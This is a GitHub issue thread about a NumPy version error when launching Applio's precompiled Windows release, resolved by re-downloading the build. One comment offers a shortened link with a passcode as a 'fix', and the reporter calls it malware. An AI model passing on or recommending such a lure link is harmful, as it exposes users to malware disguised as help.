### ISSUE TITLE
Numpy version error with pre-compiled release

### ISSUE THREAD

**Issue by embis0126** [IAHispano/Applio#672]
**Bug Description**
Numpy version error with pre-compiled release

**Steps to Reproduce**
Outline the steps to replicate the issue:
1. Run "run-applio.bat"
2. Profit

**Expected Behavior**
For the app to start.

**Assets**
![image](https://github.com/user-attachments/assets/da42b9fd-75f9-4523-bcb0-96210f73b204)

```
A module that was compiled using NumPy 1.x cannot be run in
NumPy 2.0.2 as it may crash. To support both 1.x and 2.x
versions of NumPy, modules must be compiled with NumPy 2.0.
Some module may need to rebuild instead e.g. with 'pybind11>=2.12'.

If you are a user of the module, the easiest solution will be to
downgrade to 'numpy<2' or try to upgrade the affected module.
We expect that some modules will need time to support NumPy 2.
```

**Desktop Details:**
- Operating System: Windows 11
- Browser: Chrome

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by embis0126** [comment]
> This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed

Malware, no one download.

**Comment by Vidalnt** [comment]
try downloading the precompiled again

**Comment by embis0126** [comment]
Fixed, thank you
